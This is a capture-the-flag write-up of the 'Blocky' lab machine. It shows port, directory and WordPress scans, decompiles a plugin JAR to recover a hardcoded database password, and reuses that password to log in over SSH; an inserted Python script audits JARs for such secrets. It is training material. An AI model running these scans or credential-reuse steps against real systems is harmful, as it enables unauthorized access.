Blocky

Blocky01.png

Ports scan

masscan

root@kali:~/HTB/Machines/Blocky# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.37 --rate=1000

Starting masscan 1.0.5 at 2019-11-18 19:26:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 25565/tcp on 10.10.10.37
Discovered open port 21/tcp on 10.10.10.37

nmap

root@kali:~/HTB/Machines/Blocky# nmap -sC -sV -p21,22,80,25565 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 14:30 EST
Nmap scan report for blocky.htb (10.10.10.37)
Host is up (0.045s latency).

PORT      STATE SERVICE   VERSION
21/tcp    open  ftp       ProFTPD 1.3.5a
22/tcp    open  ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open  http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
25565/tcp open  minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.15 seconds

Web enumeration

root@kali:~/HTB/Machines/Blocky# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.37

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-18_14-37-00.log
Target: http://10.10.10.37
[14:37:00] Starting:
[14:37:01] 301 - 0B - /index.php -> http://10.10.10.37/
[14:37:03] 200 - 2KB - /wp-login.php
[14:37:03] 200 - 745B - /plugins/
[14:37:05] 200 - 19KB - /license.txt
[14:37:07] 200 - 40KB - /wp-includes/
[14:37:09] 403 - 297B - /javascript/
[14:37:10] 200 - 0B - /wp-content/
[14:37:18] 403 - 290B - /.php
[14:37:34] 403 - 292B - /icons/
[14:37:35] 200 - 380B - /wiki/
[14:37:47] 200 - 135B - /wp-trackback.php
[14:38:04] 302 - 0B - /wp-admin/ -> http://10.10.10.37/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.37%2Fwp-admin%2F&reauth=1
[14:38:35] 200 - 10KB - /phpmyadmin/
[14:39:19] 405 - 42B - /xmlrpc.php
[14:43:17] 302 - 0B - /wp-signup.php -> http://10.10.10.37/wp-login.php?action=register
[14:50:02] 403 - 300B - /server-status/
Task Completed

The site runs WordPress 4.8.

Blocky02.png

phpMyAdmin 4.5.4.1 is also exposed.

Blocky03.png

And last but not least, there is the plugin folder with an unknown application.

Blocky04.png

Wordpress scan

root@kali:~/HTB/Machines/Blocky# wpscan --url http://10.10.10.37 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <WpVulnDB_API_TOKEN>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.5
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://10.10.10.37/
[+] Started: Mon Nov 18 16:43:49 2019

Interesting Finding(s):

[+] http://10.10.10.37/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.37/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://10.10.10.37/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://10.10.10.37/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="4.8">WordPress</generator>
 | Confirmed By: Opml Generator (Aggressive Detection)
 |  - http://10.10.10.37/wp-links-opml.php, Match: 'generator="WordPress/4.8"'
 |
 | [!] 34 vulnerabilities identified:
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |
 | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41397
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.8.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.8.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 4.8.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9908
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <====================> (316 / 316) 100.00% Time: 00:00:03
[+] Checking Theme Versions (via Aggressive Methods)

[i] Theme(s) Identified:

[+] twentyfifteen
 | Location: http://10.10.10.37/wp-content/themes/twentyfifteen/
 | Latest Version: 2.5
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt
 | Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 | License: GNU General Public License v2 or later
 | License URI: http://www.gnu.org/licenses/gpl-2.0.html
 | Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
 | Text Domain: twentyfifteen
 |
 | Found By: Known Locations (Aggressive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)
 |     Fixed in: 1.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7965
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429
 |      - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
 |      - https://packetstormsecurity.com/files/131802/
 |      - https://seclists.org/fulldisclosure/2015/May/41
 |
 | The version could not be determined.

[+] Enumerating Config Backups (via Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <====================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <====================> (36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <====================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] notch
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 0
 | Requests Remaining: 46

[+] Finished: Mon Nov 18 16:43:56 2019
[+] Requests Done: 489
[+] Cached Requests: 46
[+] Data Sent: 111.264 KB
[+] Data Received: 90.001 KB
[+] Memory used: 169.241 MB
[+] Elapsed time: 00:00:07

WPScan lists a lot of vulnerabilities, but the useful result is that it enumerates a user: notch.

Folder plugins

2 files:

  • BlockyCore.jar
  • griefprevention-1.11.2-3.1.1.298.jar

root@kali:~/HTB/Machines/Blocky/wordpress/plugins# unzip BlockyCore.jar
Archive:  BlockyCore.jar
 inflating: META-INF/MANIFEST.MF
 inflating: com/myfirstplugin/BlockyCore.class

root@kali:~/HTB/Machines/Blocky/wordpress/plugins/com/myfirstplugin# jad BlockyCore.class
Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating BlockyCore.jad

root@kali:~/HTB/Machines/Blocky/wordpress/plugins/com/myfirstplugin# cat BlockyCore.jad
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: BlockyCore.java

package com.myfirstplugin;

public class BlockyCore
{

    public BlockyCore()
    {
        sqlHost = "localhost";
        sqlUser = "root";
        sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }
    ...

We found the MySQL root password :)
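The finding above, turned into a pre-release check a plugin author could run on their own JAR (an added example, not part of the original write-up). It goes a step beyond the single decompiled class by reading the constant pool of every class in the archive and flagging classes that combine a credential-like String field with string literals; the function names, the SUSPICIOUS pattern and the sample class with its placeholder literal are constructed for illustration.

```python
import io
import re
import struct
import zipfile

# Payload size in bytes of each fixed-width constant-pool entry, by tag (JVMS 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
SUSPICIOUS = re.compile(r"pass|pwd|secret|token|apikey", re.I)  # heuristic, tune it


def parse_constant_pool(data):
    """Return {index: (tag, value)} for the constant pool of one .class file."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pool, off, idx = {}, 10, 1
    while idx < count:
        tag, off = data[off], off + 1
        if tag == 1:  # CONSTANT_Utf8: u2 length, then the bytes
            (n,) = struct.unpack_from(">H", data, off)
            pool[idx] = (tag, data[off + 2:off + 2 + n].decode("utf-8", "replace"))
            off += 2 + n
        elif tag in FIXED:
            pool[idx] = (tag, data[off:off + FIXED[tag]])
            off += FIXED[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag}")
        idx += 2 if tag in (5, 6) else 1  # long/double take two slots
    return pool


def audit_class(data):
    """Return (credential-like String field names, string literals) of a class."""
    pool = parse_constant_pool(data)
    utf8 = {i: v for i, (t, v) in pool.items() if t == 1}
    fields, literals = [], []
    for tag, value in pool.values():
        if tag == 12:  # NameAndType: name index, descriptor index
            name_i, desc_i = struct.unpack(">HH", value)
            name = utf8.get(name_i, "")
            if utf8.get(desc_i) == "Ljava/lang/String;" and SUSPICIOUS.search(name):
                fields.append(name)
        elif tag == 8:  # CONSTANT_String: index of the literal's Utf8 entry
            literals.append(utf8.get(struct.unpack(">H", value)[0], ""))
    return fields, literals


def audit_jar(jar_bytes):
    """Map class path -> findings for classes showing both signals."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                fields, literals = audit_class(jar.read(name))
                if fields and literals:
                    findings[name] = {"fields": fields, "literals": literals}
    return findings


def _utf8(text):
    # ASCII-only helper used to build the constructed sample below.
    return b"\x01" + struct.pack(">H", len(text)) + text.encode("ascii")


def build_sample_jar():
    """Constructed input: class header plus constant pool only (not loadable)."""
    entries = [
        _utf8("sqlPass"),                      # 1
        _utf8("Ljava/lang/String;"),           # 2
        b"\x0c" + struct.pack(">HH", 1, 2),    # 3 NameAndType sqlPass:String
        _utf8("EXAMPLE-not-a-real-password"),  # 4
        b"\x08" + struct.pack(">H", 4),        # 5 String literal -> 4
        b"\x05" + struct.pack(">q", 42),       # 6 and 7: Long, two slots
    ]
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 8)  # count = last index + 1
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/example/DemoPlugin.class", header + b"".join(entries))
    return buf.getvalue()
```

Calling audit_jar(open("plugin.jar", "rb").read()) on a real archive returns the classes to review by hand; a hit means the secret belongs in configuration outside the shipped artifact, and any value already published should be rotated.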

This password doesn't work for the WordPress login with the user notch.

Blocky05.png

But it works, as expected, with phpMyAdmin.

Blocky06.png

Since we have a user name and a password, and port 22 is open, why not try them over SSH?

root@kali:~/HTB/Machines/Blocky# ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
